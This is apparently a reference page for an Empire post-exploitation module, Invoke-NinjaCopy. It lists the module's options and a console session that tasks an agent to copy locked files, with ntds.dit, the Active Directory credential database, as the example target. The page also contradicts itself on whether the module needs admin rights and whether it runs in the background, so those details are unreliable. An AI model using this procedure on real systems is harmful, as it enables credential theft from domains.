Invoke-NinjaCopy - Empire Module
This page contains detailed information about how to use the powershell/collection/ninjacopy Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-NinjaCopy
Module: powershell/collection/ninjacopy
Source code [1]: empire/server/modules/powershell/collection/ninjacopy.yaml
Source code [2]: empire/server/data/module_source/collection/Invoke-NinjaCopy.ps1
MITRE ATT&CK:
T1105
Language: PowerShell
Needs admin: Yes
OPSEC safe: No
Background: Yes
The ninjacopy module copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the ninjacopy module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the ninjacopy module:
Agent
Agent to run module on.
Path
The full path of the file to copy (example: c:\windows\ntds\ntds.dit).
Additional Module Options
This is a list of additional options that are supported by the ninjacopy module:
ComputerName
An array of computernames to run the script on.
LocalDestination
A file path to copy the file to on the local computer.
RemoteDestination
A file path to copy the file to on the remote computer. If this isn't used, LocalDestination must be specified.
Ninjacopy Example Usage
Here's an example of how to use the ninjacopy module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/collection/ninjacopy
Author @JosephBialek
Background True
Comments https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration
/Invoke-NinjaCopy.ps1
https://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-
ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/
Description Copies a file from an NTFS partitioned volume by reading the raw
volume and parsing the NTFS structures.
Language powershell
Name powershell/collection/ninjacopy
NeedsAdmin True
OpsecSafe False
Techniques http://attack.mitre.org/techniques/T1105
,Record Options-----,-------,----------,-------------------------------------,
| Name | Value | Required | Description |
|-------------------|-------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|-------------------|-------|----------|-------------------------------------|
| ComputerName | | False | An array of computernames to run |
| | | | the script on. |
|-------------------|-------|----------|-------------------------------------|
| LocalDestination | | False | A file path to copy the file to on |
| | | | the local computer. |
|-------------------|-------|----------|-------------------------------------|
| Path | | True | The full path of the file to copy |
| | | | (example: c:\windows\ntds\ntds.dit) |
|-------------------|-------|----------|-------------------------------------|
| RemoteDestination | | False | A file path to copy the file to on |
| | | | the remote computer. If this isn't |
| | | | used, LocalDestination must be |
| | | | specified. |
'-------------------'-------'----------'-------------------------------------'
(Empire: usemodule/powershell/collection/ninjacopy) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/collection/ninjacopy) > set Path some\path
[*] Set Path to some\path
(Empire: usemodule/powershell/collection/ninjacopy) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Author
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/collection/ninjacopy.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/collection/Invoke-NinjaCopy.ps1
- https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1
- https://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/
- http://attack.mitre.org/techniques/T1105
- http://www.codeproject.com/Articles/81456/An-NTFS-Parser-Lib
- http://clymb3r.wordpress.com/
- https://github.com/clymb3r/PowerShell
- http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/
- http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html
- http://www.exploit-monday.com/
- http://msdn.microsoft.com/en-us/magazine/cc301808.aspx
See Also
Check also the following modules related to this module:
- powershell/collection/get_sql_query
- powershell/collection/SharpLoginPrompt
- powershell/collection/file_finder
- powershell/collection/get_indexed_item
- powershell/collection/clipboard_monitor
- powershell/collection/FoxDump
- powershell/collection/prompt
- powershell/collection/minidump
- powershell/collection/netripper
- powershell/collection/SauronEye
- powershell/collection/toasted
- powershell/collection/screenshot
- powershell/collection/find_interesting_file
- powershell/collection/inveigh
- powershell/collection/browser_data
- powershell/collection/WireTap
- powershell/collection/WebcamRecorder
- powershell/collection/ChromeDump
- powershell/collection/USBKeylogger
- powershell/collection/get_sql_column_sample_data
- powershell/collection/keylogger
- powershell/collection/get-winupdates
- powershell/collection/packet_capture
- powershell/collection/SharpChromium
- powershell/collection/vaults/remove_keepass_config_trigger
- powershell/collection/vaults/add_keepass_config_trigger
- powershell/collection/vaults/keethief
- powershell/collection/vaults/find_keepass_config
- powershell/collection/vaults/get_keepass_config_trigger
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.
